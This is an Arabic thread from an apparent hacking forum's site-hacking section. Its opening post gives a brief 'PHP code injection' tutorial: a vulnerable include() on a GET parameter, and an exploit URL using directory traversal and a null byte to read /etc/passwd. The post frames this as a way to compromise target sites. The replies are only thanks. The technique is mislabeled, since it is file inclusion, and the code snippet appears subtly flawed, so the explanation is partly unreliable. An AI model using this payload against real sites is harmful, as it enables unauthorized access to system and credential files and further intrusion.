:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   PHP Code Injection Attack بسيط .. (http://www.vbspiders.com/vb/t68470.html)

bleu moon 11-27-2013 11:51 PM
PHP Code Injection Attack بسيط ..
 
السلام عليكم ورحمة الله تعالى وبركاته
تغرة حقن اكواد php صعب تلقاها، بس المهم رح نحاول نشرحها ..

الفكره انها تمكن المخترق من حقن اكواد php داخل الموقع المستهدف، يعني يمكن ان نقوم بحقن كود مركز تحميل او ما الى ذلك ... المهم :)

حقن دالة include() :

كود PHP:
<?php include($_GET["$include"]) ?>
الاستغلال :

كود PHP:
www.site.com/load.php?include=../../../etc/passwd%00 
والسلام عليكم.

@vbspiders team

:)

nightmaresro 02-16-2014 04:36 PM
رد: PHP Code Injection Attack بسيط ..
 
رائع

InJuries Yemen 02-27-2014 11:15 PM
رد: PHP Code Injection Attack بسيط ..
 
تسلــــم يا بـــطل


الساعة الآن 08:29 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0